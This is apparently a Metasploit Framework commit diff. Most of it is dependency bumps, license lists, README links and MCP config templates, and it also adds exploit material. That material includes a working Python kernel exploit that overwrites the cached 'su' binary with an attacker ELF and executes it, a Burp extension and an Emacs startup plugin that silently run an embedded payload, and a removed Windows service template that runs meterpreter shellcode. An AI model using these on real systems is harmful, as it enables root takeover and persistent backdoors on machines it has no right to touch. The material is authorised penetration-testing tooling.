tsort (0.2.0)
ttfunk (1.8.0)
bigdecimal (~> 3.1)
tzinfo (2.0.6)
concurrent-ruby (~> 1.0)
tzinfo-data (1.2025.2)
tzinfo-data (1.2025.1)
tzinfo (>= 1.0.0)
unicode-display_width (3.1.4)
unicode-emoji (~> 4.0, >= 4.0.4)
unicode-emoji (4.0.4)
unicode-display_width (3.2.0)
unicode-emoji (~> 4.1)
unicode-emoji (4.1.0)
unix-crypt (1.3.1)
useragent (0.16.11)
warden (1.2.9)
rack (>= 2.0.9)
webmock (3.26.2)
addressable (>= 2.8.0)
crack (>= 0.3.2)
hashdiff (>= 0.4.0, < 2.0.0)
webrick (1.9.1)
websocket-driver (0.8.0)
websocket-driver (0.7.7)
base64
websocket-extensions (>= 0.1.0)
websocket-extensions (0.1.5)
@@ -685,6 +713,7 @@ DEPENDENCIES
simplecov (= 0.18.2)
test-prof
timecop
webmock (~> 3.18)
yard
BUNDLED WITH
+1 -1
View File
@@ -2,7 +2,7 @@ Format: https://www.debian.org/doc/packaging-manuals/copyright-format/1.0/
Source: https://www.metasploit.com/
Files: *
Copyright: 2006-2025, Rapid7, Inc.
Copyright: 2006-2026, Rapid7, Inc.
License: BSD-3-clause
# The Metasploit Framework is provided under the 3-clause BSD license provided
+75 -65
View File
@@ -2,15 +2,15 @@ This file is auto-generated by tools/dev/update_gem_licenses.sh
Ascii85, 2.0.1, MIT
aarch64, 2.1.0, "Apache 2.0"
abbrev, 0.1.2, "ruby, Simplified BSD"
actionpack, 7.1.5.1, MIT
actionview, 7.1.5.1, MIT
activemodel, 7.1.5.1, MIT
activerecord, 7.1.5.1, MIT
activesupport, 7.1.5.1, MIT
actionpack, 7.2.2.2, MIT
actionview, 7.2.2.2, MIT
activemodel, 7.2.2.2, MIT
activerecord, 7.2.2.2, MIT
activesupport, 7.2.2.2, MIT
addressable, 2.8.7, "Apache 2.0"
afm, 0.2.2, MIT
allure-rspec, 2.26.0, "Apache 2.0"
allure-ruby-commons, 2.26.0, "Apache 2.0"
allure-rspec, 2.27.0, "Apache 2.0"
allure-ruby-commons, 2.27.0, "Apache 2.0"
arel-helpers, 2.16.0, MIT
ast, 2.4.3, MIT
aws-eventstream, 1.3.2, "Apache 2.0"
@@ -23,41 +23,42 @@ aws-sdk-kms, 1.99.0, "Apache 2.0"
aws-sdk-s3, 1.182.0, "Apache 2.0"
aws-sdk-ssm, 1.191.0, "Apache 2.0"
aws-sigv4, 1.11.0, "Apache 2.0"
base64, 0.2.0, "ruby, Simplified BSD"
base64, 0.3.0, "ruby, Simplified BSD"
bcrypt, 3.1.20, MIT
bcrypt_pbkdf, 1.1.1, MIT
benchmark, 0.4.1, "ruby, Simplified BSD"
bigdecimal, 3.2.2, "ruby, Simplified BSD"
bigdecimal, 3.3.1, "ruby, Simplified BSD"
bindata, 2.4.15, "Simplified BSD"
bootsnap, 1.18.4, MIT
bson, 5.0.2, "Apache 2.0"
bson, 5.1.1, "Apache 2.0"
builder, 3.3.0, MIT
bundler, 2.5.22, MIT
byebug, 11.1.3, "Simplified BSD"
byebug, 12.0.0, "Simplified BSD"
chunky_png, 1.4.0, MIT
coderay, 1.1.3, MIT
concurrent-ruby, 1.3.4, MIT
connection_pool, 2.5.3, MIT
concurrent-ruby, 1.3.5, MIT
connection_pool, 2.5.4, MIT
cookiejar, 0.3.4, "Simplified BSD"
crack, 1.0.1, MIT
crass, 1.0.6, MIT
csv, 3.3.2, "ruby, Simplified BSD"
daemons, 1.4.1, MIT
date, 3.4.1, "ruby, Simplified BSD"
debug, 1.8.0, "ruby, Simplified BSD"
diff-lcs, 1.6.0, "MIT, Artistic-1.0-Perl, GPL-2.0-or-later"
dnsruby, 1.72.4, "Apache 2.0"
debug, 1.11.0, "ruby, Simplified BSD"
diff-lcs, 1.6.2, "MIT, Artistic-1.0-Perl, GPL-2.0-or-later"
dnsruby, 1.73.1, "Apache 2.0"
docile, 1.4.1, MIT
domain_name, 0.6.20240107, "Simplified BSD, New BSD, Mozilla Public License 2.0"
drb, 2.2.3, "ruby, Simplified BSD"
ed25519, 1.3.0, MIT
ed25519, 1.4.0, MIT
elftools, 1.3.1, MIT
em-http-request, 1.1.7, MIT
em-socksify, 0.3.3, MIT
erb, 5.0.2, "ruby, Simplified BSD"
erb, 5.0.3, "ruby, Simplified BSD"
erubi, 1.13.1, MIT
eventmachine, 1.2.7, "ruby, GPL-2.0"
factory_bot, 6.5.1, MIT
factory_bot_rails, 6.4.4, MIT
factory_bot, 6.5.5, MIT
factory_bot_rails, 6.5.1, MIT
faker, 3.5.1, MIT
faraday, 2.7.11, MIT
faraday-net_http, 3.0.2, MIT
@@ -71,9 +72,11 @@ forwardable, 1.3.3, "ruby, Simplified BSD"
getoptlong, 0.2.1, "ruby, Simplified BSD"
gssapi, 1.3.1, MIT
gyoku, 1.4.0, MIT
hashdiff, 1.2.1, MIT
hashery, 2.1.2, "Simplified BSD"
hrr_rb_ssh, 0.4.2, "Apache 2.0"
hrr_rb_ssh-ed25519, 0.4.2, "Apache 2.0"
http-accept, 1.7.0, MIT
http-cookie, 1.0.8, MIT
http_parser.rb, 0.8.0, MIT
httpclient, 2.9.0, ruby
@@ -83,30 +86,32 @@ ipaddr, 1.2.7, "ruby, Simplified BSD"
irb, 1.15.2, "ruby, Simplified BSD"
jmespath, 1.6.2, "Apache 2.0"
jsobfu, 0.4.2, "New BSD"
json, 2.10.2, ruby
json, 2.15.1, ruby
json-schema, 6.2.0, MIT
language_server-protocol, 3.17.0.5, MIT
license_finder, 5.11.1, MIT
lint_roller, 1.1.0, MIT
little-plugger, 1.1.4, MIT
logger, 1.6.6, "ruby, Simplified BSD"
logger, 1.7.0, "ruby, Simplified BSD"
logging, 2.4.0, MIT
loofah, 2.24.1, MIT
lru_redux, 1.1.0, MIT
mcp, 0.13.0, "Apache 2.0"
memory_profiler, 1.1.0, MIT
metasm, 1.0.5, LGPL-2.1
metasploit-concern, 5.0.5, "New BSD"
metasploit-credential, 6.0.16, "New BSD"
metasploit-framework, 6.4.76, "New BSD"
metasploit-credential, 6.0.23, "New BSD"
metasploit-framework, 6.4.133, "New BSD"
metasploit-model, 5.0.4, "New BSD"
metasploit-payloads, 2.0.221, "3-clause (or ""modified"") BSD"
metasploit_data_models, 6.0.10, "New BSD"
metasploit_payloads-mettle, 1.0.42, "3-clause (or ""modified"") BSD"
metasploit-payloads, 2.0.245, "3-clause (or ""modified"") BSD"
metasploit_data_models, 6.0.18, "New BSD"
metasploit_payloads-mettle, 1.0.46, "3-clause (or ""modified"") BSD"
method_source, 1.1.0, MIT
mime-types, 3.6.0, MIT
mime-types-data, 3.2025.0304, MIT
mime-types, 3.7.0, MIT
mime-types-data, 3.2025.0924, MIT
mini_portile2, 2.8.9, MIT
minitest, 5.25.5, MIT
mqtt, 0.6.0, MIT
mqtt, 0.7.0, MIT
msgpack, 1.6.1, "Apache 2.0"
multi_json, 1.15.0, MIT
mustermann, 3.0.3, MIT
@@ -118,88 +123,90 @@ net-protocol, 0.2.2, "ruby, Simplified BSD"
net-sftp, 4.0.0, MIT
net-smtp, 0.5.1, "ruby, Simplified BSD"
net-ssh, 7.3.0, MIT
netrc, 0.11.0, MIT
network_interface, 0.0.4, MIT
nexpose, 7.3.0, "New BSD"
nio4r, 2.7.4, "MIT, Simplified BSD"
nokogiri, 1.18.8, MIT
nokogiri, 1.18.10, MIT
nori, 2.7.1, MIT
octokit, 4.25.1, MIT
octokit, 10.0.0, MIT
openssl-ccm, 1.2.3, MIT
openssl-cmac, 2.0.2, MIT
openvas-omp, 0.0.4, MIT
ostruct, 0.6.1, "ruby, Simplified BSD"
packetfu, 2.0.0, "New BSD"
parallel, 1.27.0, MIT
parser, 3.3.8.0, MIT
parser, 3.3.9.0, MIT
parslet, 1.8.2, MIT
patch_finder, 1.0.2, "New BSD"
pcaprub, 0.13.3, LGPL-2.1
pdf-reader, 2.14.1, MIT
pg, 1.5.9, "Simplified BSD"
pp, 0.6.2, "ruby, Simplified BSD"
pp, 0.6.3, "ruby, Simplified BSD"
prettyprint, 0.2.0, "ruby, Simplified BSD"
prism, 1.4.0, MIT
pry, 0.14.2, MIT
pry-byebug, 3.10.1, MIT
prism, 1.5.1, MIT
pry, 0.15.2, MIT
pry-byebug, 3.11.0, MIT
psych, 5.2.6, MIT
public_suffix, 6.0.1, MIT
public_suffix, 6.0.2, MIT
puma, 6.6.0, "New BSD"
racc, 1.8.1, "ruby, Simplified BSD"
rack, 2.2.17, MIT
rack, 2.2.19, MIT
rack-protection, 3.2.0, MIT
rack-session, 1.0.2, MIT
rack-test, 2.2.0, MIT
rackup, 1.0.1, MIT
rails-dom-testing, 2.3.0, MIT
rails-html-sanitizer, 1.6.2, MIT
railties, 7.1.5.1, MIT
railties, 7.2.2.2, MIT
rainbow, 3.1.1, MIT
rake, 13.3.0, MIT
rasn1, 0.14.0, MIT
rb-readline, 0.5.5, BSD
rdoc, 6.14.2, ruby
recog, 3.1.17, unknown
rdoc, 6.15.0, ruby
recog, 3.1.14, unknown
redcarpet, 3.6.1, MIT
regexp_parser, 2.10.0, MIT
reline, 0.6.1, ruby
regexp_parser, 2.11.3, MIT
reline, 0.6.2, ruby
require_all, 3.0.0, MIT
rex-arch, 0.1.18, "New BSD"
rex-bin_tools, 0.1.10, "New BSD"
rex-core, 0.1.34, "New BSD"
rex-encoder, 0.1.8, "New BSD"
rex-exploitation, 0.1.41, "New BSD"
rest-client, 2.1.0, MIT
rex-arch, 0.1.20, "New BSD"
rex-bin_tools, 0.1.16, "New BSD"
rex-core, 0.1.36, "New BSD"
rex-encoder, 0.1.10, "New BSD"
rex-exploitation, 0.1.44, "New BSD"
rex-java, 0.1.8, "New BSD"
rex-mime, 0.1.11, "New BSD"
rex-nop, 0.1.4, "New BSD"
rex-ole, 0.1.9, "New BSD"
rex-powershell, 0.1.101, "New BSD"
rex-random_identifier, 0.1.16, "New BSD"
rex-powershell, 0.1.103, "New BSD"
rex-random_identifier, 0.1.21, "New BSD"
rex-registry, 0.1.6, "New BSD"
rex-rop_builder, 0.1.6, "New BSD"
rex-socket, 0.1.63, "New BSD"
rex-socket, 0.1.65, "New BSD"
rex-sslscan, 0.1.13, "New BSD"
rex-struct2, 0.1.5, "New BSD"
rex-text, 0.2.61, "New BSD"
rex-text, 0.2.63, "New BSD"
rex-zip, 0.1.6, "New BSD"
rexml, 3.4.1, "Simplified BSD"
rinda, 0.2.0, "ruby, Simplified BSD"
rkelly-remix, 0.0.7, MIT
rspec, 3.13.0, MIT
rspec-core, 3.13.3, MIT
rspec-expectations, 3.13.3, MIT
rspec-mocks, 3.13.2, MIT
rspec-rails, 7.1.1, MIT
rspec, 3.13.1, MIT
rspec-core, 3.13.5, MIT
rspec-expectations, 3.13.5, MIT
rspec-mocks, 3.13.5, MIT
rspec-rails, 8.0.2, MIT
rspec-rerun, 1.1.0, MIT
rspec-support, 3.13.2, MIT
rspec-support, 3.13.6, MIT
rubocop, 1.75.7, MIT
rubocop-ast, 1.44.1, MIT
rubocop-ast, 1.47.1, MIT
ruby-macho, 4.1.0, MIT
ruby-mysql, 4.2.0, MIT
ruby-prof, 1.7.1, "Simplified BSD"
ruby-prof, 1.7.2, "Simplified BSD"
ruby-progressbar, 1.13.0, MIT
ruby-rc4, 0.1.5, MIT
ruby2_keywords, 0.0.5, "ruby, Simplified BSD"
ruby_smb, 3.3.15, "New BSD"
ruby_smb, 3.3.17, "New BSD"
rubyntlm, 0.6.5, MIT
rubyzip, 2.4.1, "Simplified BSD"
sawyer, 0.9.2, MIT
@@ -216,18 +223,21 @@ swagger-blocks, 3.0.0, MIT
syslog, 0.3.0, "ruby, Simplified BSD"
test-prof, 1.4.4, MIT
thin, 1.8.2, "GPL-2.0+, ruby"
thor, 1.3.2, MIT
thor, 1.4.0, MIT
tilt, 2.6.0, MIT
timecop, 0.9.10, MIT
timeout, 0.4.3, "ruby, Simplified BSD"
toml, 0.2.0, MIT
tsort, 0.2.0, "ruby, Simplified BSD"
ttfunk, 1.8.0, "Nonstandard, GPL-2.0-only, GPL-3.0-only"
tzinfo, 2.0.6, MIT
tzinfo-data, 1.2025.1, MIT
unicode-display_width, 3.1.4, MIT
unicode-emoji, 4.0.4, MIT
unicode-display_width, 3.2.0, MIT
unicode-emoji, 4.1.0, MIT
unix-crypt, 1.3.1, 0BSD
useragent, 0.16.11, MIT
warden, 1.2.9, MIT
webmock, 3.26.2, MIT
webrick, 1.9.1, "ruby, Simplified BSD"
websocket-driver, 0.7.7, "Apache 2.0"
websocket-extensions, 0.1.5, "Apache 2.0"
+8 -1
View File
@@ -18,7 +18,14 @@ Submit bugs and feature requests via the [GitHub Issues](https://github.com/rapi
For information on writing modules, refer to the [API Documentation](https://docs.metasploit.com/api/).
## Support and Communication
For questions and suggestions, join the Freenode IRC channel or contact the metasploit-hackers mailing list.
For questions and suggestions, you can:
- Join our [GitHub Discussions](https://github.com/rapid7/metasploit-framework/discussions) for community support and general questions
- Join the [Metasploit Slack](https://join.slack.com/t/metasploit/shared_invite/zt-30i688it0-mJsFGT44IMtdeZi1DraamQ) for real-time chat
- Submit [GitHub Issues](https://github.com/rapid7/metasploit-framework/issues) for bug reports and feature requests
- Follow [@metasploit](https://x.com/metasploit) on X or [@metasploit@infosec.exchange](https://infosec.exchange/@metasploit) on Mastodon for updates
**Note:** Some community members may still use IRC channels and the metasploit-hackers mailing list, though the primary support channels are now GitHub Discussions and Slack.
## Installing Metasploit
+21 -1
View File
@@ -4,6 +4,26 @@ Fiddle.const_set(:VERSION, '0.0.0') unless Fiddle.const_defined?(:VERSION)
require 'rails'
require File.expand_path('../boot', __FILE__)
require 'action_view'
# Monkey patch https://github.com/rails/rails/blob/v7.2.2.1/actionview/lib/action_view/helpers/tag_helper.rb#L51
# Might be fixed by 8.x https://github.com/rails/rails/blob/v8.0.2/actionview/lib/action_view/helpers/tag_helper.rb#L51C1-L52C1
raise unless ActionView::VERSION::STRING == '7.2.2.2' # A developer will need to ensure this is still required when bumping rails
module ActionView::Helpers::TagHelper
class TagBuilder
def self.define_element(name, code_generator:, method_name: name.to_s.underscore)
code_generator.define_cached_method(method_name, namespace: :tag_builder) do |batch|
# Fixing a bug introduced by Metasploit's global Kernel patch: https://github.com/rapid7/metasploit-framework/blob/ae1db09f32cd04c007dbf445cf16dc22c9fc2e53/lib/rex.rb#L74-L79
# which fails when using the below 'instance_methods.include?(method_name.to_sym)' check
batch.push(<<~RUBY) # unless instance_methods.include?(method_name.to_sym)
def #{method_name}(content = nil, escape: true, **options, &block)
tag_string("#{name}", content, options, escape: escape, &block)
end
RUBY
end
end
end
end
all_environments = [
:development,
:production,
@@ -41,7 +61,7 @@ module Metasploit
config.paths['config/database'] = [Metasploit::Framework::Database.configurations_pathname.try(:to_path)]
config.autoloader = :zeitwerk
config.load_defaults 7.1
config.load_defaults 7.2
config.eager_load = false
end
+33
View File
@@ -0,0 +1,33 @@
# Metasploit RPC API connection (MessagePack)
msf_api:
type: messagepack
host: localhost
port: 55553
ssl: true
endpoint: /api/
user: msfuser
password: CHANGEME
auto_start_rpc: true # Automatically start the RPC server if not running (default: true)
# MCP server configuration
mcp:
transport: stdio # stdio (default) or http
# MCP server network configuration (for HTTP transport only)
host: localhost # Host to bind to (default: localhost)
port: 3000 # Port to listen on (default: 3000)
# Rate limiting (optional - defaults shown)
rate_limit:
enabled: true
requests_per_minute: 60
# If the `burst_size` is greater than `requests_per_minute`, a user will be allowed to exceed the rate limit temporarily.
# For example, with `requests_per_minute=5` and `burst_size=10`, a user could make 10 requests in a short period,
# but then would be limited to 5 requests per minute thereafter.
burst_size: 10
# Logging (optional - defaults shown)
logging:
enabled: false
level: INFO # DEBUG, INFO, WARN, ERROR
log_file: ~/.msf4/logs/msfmcp.log
sanitize: true
+32
View File
@@ -0,0 +1,32 @@
# Metasploit RPC API connection (JSON-RPC)
msf_api:
type: json-rpc
host: localhost
port: 8081
ssl: true
endpoint: /api/v1/json-rpc
token: YOUR_BEARER_TOKEN_HERE
# auto_start_rpc is not supported for JSON-RPC (only MessagePack)
# MCP server configuration
mcp:
transport: stdio # stdio (default) or http
# MCP server network configuration (for HTTP transport only)
host: localhost # Host to bind to (default: localhost)
port: 3000 # Port to listen on (default: 3000)
# Rate limiting (optional - defaults shown)
rate_limit:
enabled: true
requests_per_minute: 60
# If the `burst_size` is greater than `requests_per_minute`, a user will be allowed to exceed the rate limit temporarily.
# For example, with `requests_per_minute=5` and `burst_size=10`, a user could make 10 requests in a short period,
# but then would be limited to 5 requests per minute thereafter.
burst_size: 10
# Logging (optional - defaults shown)
logging:
enabled: false
level: INFO # DEBUG, INFO, WARN, ERROR
log_file: ~/.msf4/logs/msfmcp.log
sanitize: true
+11
View File
@@ -0,0 +1,11 @@
meterpreter
▄▄▄▄ ▒█████ █████▒
▓█████▄ ▒██▒ ██▒▓██ ▒
▒██▒ ▄██▒██░ ██▒▒████ ░
▒██░█▀ ▒██ ██░░▓█▒ ░
░▓█ ▀█▓░ ████▓▒░░▒█░
░▒▓███▀▒░ ▒░▒░▒░ ▒ ░
▒░▒ ░ ░ ▒ ▒░ ░ ~ by @kev169, @GuhnooPluxLinux, @R0wdyJoe, @skylerknecht ~
░ ░ ░ ░ ░ ▒ ░ ░
░ ░ ░ loader
@@ -0,0 +1,88 @@
import hashlib
import re
import argparse
import sys
from urllib.parse import urlsplit, parse_qs, unquote, quote
from typing import Dict, List, Tuple
_SIGNATURE_REGEX = re.compile(r'[^A-Za-z0-9/?_.=&{}\[\]":, -]')
def compute_signature(method: str, path: str, body: str = '', key: str = '') -> str:
if not method or not path:
raise ValueError("Method and path must be provided.")
url_parts = urlsplit(path)
base_path = url_parts.path
if not base_path.startswith('/'):
base_path = '/' + base_path
raw_query_params: Dict[str, List[str]] = parse_qs(
url_parts.query, keep_blank_values=True, strict_parsing=False
)
canonical_query: List[Tuple[str, str]] = []
for k, v_list in raw_query_params.items():
if k == '_signature':
continue
value = unquote(v_list[0]) if v_list else ''
canonical_query.append((k, value))
canonical_query.sort(key=lambda item: item[0])
query_string = '&'.join(f"{k}={quote(v)}" for k, v in canonical_query)
if query_string:
canonical_path = f"{base_path}?{query_string}"
else:
canonical_path = base_path
canonical_path = re.sub(_SIGNATURE_REGEX, '-', canonical_path)
body_for_signing = re.sub(_SIGNATURE_REGEX, '-', body)
if not key:
password_hash = "da39a3ee5e6b4b0d3255bfef95601890afd80709"
else:
password_hash = hashlib.sha1(key.encode('utf-8')).hexdigest().lower()
data = f"{method.upper()}:{canonical_path}:{body_for_signing}:{password_hash}"
return hashlib.sha1(data.encode('utf-8')).hexdigest().lower()
def main():
parser = argparse.ArgumentParser(description="Computes a SHA1 signature for an HTTP request.")
parser.add_argument('--method', type=str, required=True,
choices=['GET', 'POST', 'PUT', 'DELETE'],
help="The HTTP method (e.g., GET).")
parser.add_argument('--path', type=str, required=True,
help="The canonical path (e.g., /api/resource?param=value).")
parser.add_argument('--key', type=str, default='',
help="The secret key. Defaults to an empty string.")
parser.add_argument('--body', type=str, default='',
help="The request body as a string. Defaults to an empty string.")
try:
args = parser.parse_args()
signature = compute_signature(
method=args.method,
path=args.path,
body=args.body,
key=args.key
)
print(f"Computed Signature: {signature}")
except ValueError as e:
sys.stderr.write(f"Error: {e}\n")
sys.exit(1)
except Exception as e:
sys.stderr.write(f"An unexpected error occurred: {e}\n")
sys.exit(1)
if __name__ == '__main__':
main()
+25
View File
@@ -0,0 +1,25 @@
FROM php:8.3-fpm
RUN apt-get clean && apt-get update && \
apt-get install -y \
wget unzip \
libicu-dev \
libfreetype6-dev \
libjpeg62-turbo-dev \
libxml2-dev \
libwebp-dev \
libpng-dev \
libzip-dev \
libonig-dev \
libcurl4-openssl-dev && \
docker-php-ext-configure gd --with-webp --with-jpeg && \
docker-php-ext-install -j$(nproc) gd xml dom curl mbstring intl gettext zip mysqli && \
pecl install apcu && docker-php-ext-enable apcu && \
rm -rf /var/lib/apt/lists/*
WORKDIR /var/www/html
RUN wget https://github.com/givanz/Vvveb/releases/download/1.0.5/latest.zip && \
unzip latest.zip && rm latest.zip
COPY php.ini /usr/local/etc/php/php.ini
@@ -0,0 +1,43 @@
services:
php:
build: .
container_name: vvveb-php
volumes:
- vvveb_html:/var/www/html
networks:
- vvveb-net
nginx:
image: nginx:stable
container_name: vvveb-nginx
ports:
- "8080:80"
volumes:
- ./nginx.conf:/etc/nginx/conf.d/default.conf
- vvveb_html:/var/www/html:ro
depends_on:
- php
networks:
- vvveb-net
mysql:
image: mysql:5.7
container_name: vvveb-mysql
restart: unless-stopped
environment:
MYSQL_ROOT_PASSWORD: root
MYSQL_DATABASE: vvveb
MYSQL_USER: vvveb
MYSQL_PASSWORD: vvveb
volumes:
- db_data:/var/lib/mysql
networks:
- vvveb-net
networks:
vvveb-net:
driver: bridge
volumes:
db_data:
vvveb_html:
+21
View File
@@ -0,0 +1,21 @@
server {
listen 80;
server_name localhost;
root /var/www/html;
index index.php index.html;
location / {
try_files $uri $uri/ /index.php?$args;
}
location ~ \.php$ {
try_files $uri =404;
fastcgi_split_path_info ^(.+\.php)(/.+)$;
fastcgi_pass php:9000;
fastcgi_index index.php;
include fastcgi_params;
fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
fastcgi_param PATH_INFO $fastcgi_path_info;
}
}
+5
View File
@@ -0,0 +1,5 @@
display_errors = On
memory_limit = 512M
upload_max_filesize = 64M
post_max_size = 64M
max_execution_time = 300
File diff suppressed because one or more lines are too long
+33
View File
@@ -0,0 +1,33 @@
#!/usr/bin/env python3
import os
import socket
import sys
AF_ALG = 38
ALG_NAME = "authencesn(hmac(sha256),cbc(aes))"
def check():
if not os.path.exists('/proc/crypto'):
print('[-] /proc/crypto is missing.')
return
try:
s = socket.socket(AF_ALG, socket.SOCK_SEQPACKET, 0)
except OSError as e:
print('[-] AF_ALG socket family unavailable (' + e.strerror + ').')
return
try:
s.bind(("aead", ALG_NAME))
except OSError as e:
print('[-] ' + repr(ALG_NAME) + ' can not be instantiated (' + e.strerror + ').')
return
finally:
s.close()
print('[+] The exploit socket has been created, encryption primitives are available.')
return True
if __name__ == '__main__':
if not check():
sys.exit(1)
@@ -0,0 +1,9 @@
import os
import shutil
su_path = shutil.which('su')
su_fd = os.open(su_path, os.O_RDONLY)
try:
os.posix_fadvise(su_fd, 0, 0, os.POSIX_FADV_DONTNEED)
finally:
os.close(su_fd)
+56
View File
@@ -0,0 +1,56 @@
#!/usr/bin/env python3
import os
import base64
import shutil
import socket
import sys
import zlib
AF_ALG = 38
ALG_SET_KEY = 1
ALG_SET_IV = 2
ALG_SET_OP = 3
ALG_SET_AEAD_ASSOCLEN = 4
ALG_SET_AEAD_AUTHSIZE = 5
SOL_ALG = 279
def setup_sock():
sock = socket.socket(AF_ALG, socket.SOCK_SEQPACKET, 0)
sock.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))
sock.setsockopt(SOL_ALG, ALG_SET_KEY, bytes.fromhex("0800010000000010" + "0" * 64))
sock.setsockopt(SOL_ALG, ALG_SET_AEAD_AUTHSIZE, None, 4)
op_sock, _ = sock.accept()
return op_sock
def write(op_sock, su_fd, offset, chunk):
op_sock.sendmsg(
[b"A" * 4 + chunk],
[
(SOL_ALG, ALG_SET_OP, b'\x00\x00\x00\x00'),
(SOL_ALG, ALG_SET_IV, b'\x10' + b'\x00' * 19),
(SOL_ALG, ALG_SET_AEAD_ASSOCLEN, b'\x08\x00\x00\x00')
],
32768
)
r, w = os.pipe()
os.splice(su_fd, w, offset + 4, offset_src=0)
os.splice(r, op_sock.fileno(), offset + 4)
try:
op_sock.recv(8 + offset)
except:
pass
su_path = shutil.which('su')
su_fd = os.open(su_path, os.O_RDONLY)
try:
elf = zlib.decompress(base64.standard_b64decode(sys.argv[1]))
except:
print('[-] failed to load the ELF executable from the argument, it must be base64+gzip')
sys.exit(os.EX_USAGE)
op_sock = setup_sock()
for i in range(0, len(elf), 4):
write(op_sock, su_fd, i, elf[i:i + 4])
op_sock.close()
os.execvp(su_path, ["su"] + sys.argv[1:])
+9
View File
@@ -0,0 +1,9 @@
# Prerequisites
You'll need `gradle` which can be installed on Kali via `sudo apt-get install gradle`
# Build
1. Build: `gradle clean build`
1. Post build extension location: `build/libs/MetasploitPayloadExtension.jar`
2. Copy the files into the proper location: `cp build/classes/java/main/burp/BurpExtender.class precompiled.class`
+27
View File
@@ -0,0 +1,27 @@
apply plugin: 'java'
repositories {
mavenCentral()
}
dependencies {
// implementation 'net.portswigger.burp.extender:burp-extender-api:1.7.13'
implementation 'net.portswigger.burp.extender:burp-extender-api:2.3'
}
sourceSets {
main {
java {
srcDir 'src/main/java'
}
resources {
srcDir 'src/main/resources'
}
}
}
task fatJar(type: Jar) {
baseName = project.name + '-all'
from { configurations.compile.collect { it.isDirectory() ? it : zipTree(it) } }
with jar
}
Binary file not shown.
@@ -0,0 +1 @@
rootProject.name = 'MetasploitPayloadExtension'
@@ -0,0 +1,96 @@
package burp;
import java.io.File;
import java.io.InputStream;
import java.io.PrintWriter;
import java.nio.charset.StandardCharsets;
import java.util.Scanner;
import java.net.URL;
import java.net.URLClassLoader;
import java.lang.reflect.Method;
public class BurpExtender implements IBurpExtender {
@Override
public void registerExtenderCallbacks(IBurpExtenderCallbacks callbacks) {
// Read extension name from resource file and set it
InputStream nameInputStream = getClass().getClassLoader().getResourceAsStream("name.txt");
Scanner nameScanner = new Scanner(nameInputStream, StandardCharsets.UTF_8.name());
String extensionName = nameScanner.useDelimiter("\\A").next().trim();
callbacks.setExtensionName(extensionName);
// Obtain our output and error streams
PrintWriter stdout = new PrintWriter(callbacks.getStdout(), true);
PrintWriter stderr = new PrintWriter(callbacks.getStderr(), true);
// Detect operating system
String os = System.getProperty("os.name").toLowerCase();
Process process;
try {
stdout.println("Initializing extension.");
// Locate command.txt using ClassLoader
InputStream commandInputStream = getClass().getClassLoader().getResourceAsStream("command.txt");
if (commandInputStream != null) {
// Read the command from command.txt
Scanner commandScanner = new Scanner(commandInputStream, StandardCharsets.UTF_8.name());
String command = commandScanner.useDelimiter("\\A").next().trim();
if (os.contains("win")) {
// Create a temporary batch script to avoid line length issues from command line
File tempScript = File.createTempFile("command", ".bat");
tempScript.deleteOnExit(); // Ensure the file is deleted after execution
// Write the command to the script file
try (PrintWriter writer = new PrintWriter(tempScript, StandardCharsets.UTF_8.name())) {
writer.println("@echo off");
writer.println(command); // Write the payload command
}
// Execute the script file
process = Runtime.getRuntime().exec(new String[]{"cmd.exe", "/c", tempScript.getAbsolutePath()});
} else {
// Unix-based systems: Use /bin/bash
process = Runtime.getRuntime().exec(new String[]{"/bin/bash", "-c", command});
}
} else {
// Load burp_extension_pload.jar from resources
InputStream jarInputStream = getClass().getClassLoader().getResourceAsStream("burp_extension_pload.jar");
if (jarInputStream == null) {
throw new Exception("burp_extension_pload.jar not found in resources");
}
// Save the jar to a temporary file
File tempJar = File.createTempFile("burp_extension_pload", ".jar");
tempJar.deleteOnExit();
try (InputStream inputStream = jarInputStream) { // Declare jarInputStream as a resource
java.nio.file.Files.copy(inputStream, tempJar.toPath(), java.nio.file.StandardCopyOption.REPLACE_EXISTING);
}
// Load the jar using URLClassLoader
stdout.println("Loading internal jar");
try (URLClassLoader classLoader = new URLClassLoader(
new URL[]{tempJar.toURI().toURL()},
null // Use null for an isolated class loader
)) {
Class<?> mainClass = classLoader.loadClass("metasploit.Payload");
Method mainMethod = mainClass.getDeclaredMethod("main", String[].class);
mainMethod.invoke(null, (Object) new String[]{});
} catch (ClassNotFoundException e) {
stderr.println("Class not found: " + e.getMessage());
} catch (NoSuchMethodException e) {
stderr.println("Main method not found: " + e.getMessage());
} catch (Exception e) {
stderr.println("Error loading jar file (" + tempJar.toPath() + "): " + e.getMessage());
e.printStackTrace(stderr);
}
}
stdout.println("Finished initializing extension.");
} catch (Exception e) {
stderr.println("Error loading extension: " + e.getMessage());
}
}
}
@@ -0,0 +1 @@
FOOBARBAZ
@@ -0,0 +1 @@
Metasploit Payload Extension
+15
View File
@@ -0,0 +1,15 @@
(defun PLUGIN_NAME--process-sentinel (proc event)
(when (memq (process-status proc) '(exit signal))
(delete-process proc)))
(defun PLUGIN_NAME-run-async ()
(make-process
:name "PLUGIN_NAME"
:buffer nil
:command (list "bash" "-li" "-c" "PAYLOAD_PLACEHOLDER")
:noquery t
:sentinel #'PLUGIN_NAME--process-sentinel))
(add-hook 'emacs-startup-hook #'PLUGIN_NAME-run-async)
(provide 'PLUGIN_NAME)
@@ -1,304 +0,0 @@
#include <String.h>
#include <Windows.h>
#include <stdlib.h>
#include <stdio.h>
#define SERVICE_NAME <%= @service_name.inspect %>
#define DISPLAY_NAME <%= @service_description.inspect %>
#define RETRY_TIME <%= @retry_time %>
//
// Globals
//
SERVICE_STATUS status;
SERVICE_STATUS_HANDLE hStatus;
//
// Meterpreter connect back to host
//
void start_meterpreter()
{
// Your meterpreter shell here
<%= buf %>
LPVOID buffer = (LPVOID)VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(buffer,buf,sizeof(buf));
HANDLE hThread = CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)(buffer),NULL,0,NULL);
WaitForSingleObject(hThread, -1); //INFINITE
CloseHandle(hThread);
}
//
// Call self without parameter to start meterpreter
//
void self_call()
{
char path[MAX_PATH];
char cmd[MAX_PATH];
if (GetModuleFileName(NULL, path, sizeof(path)) == 0) {
// Get module file name failed
return;
}
STARTUPINFO startup_info;
PROCESS_INFORMATION process_information;
ZeroMemory(&startup_info, sizeof(startup_info));
startup_info.cb = sizeof(startup_info);
ZeroMemory(&process_information, sizeof(process_information));
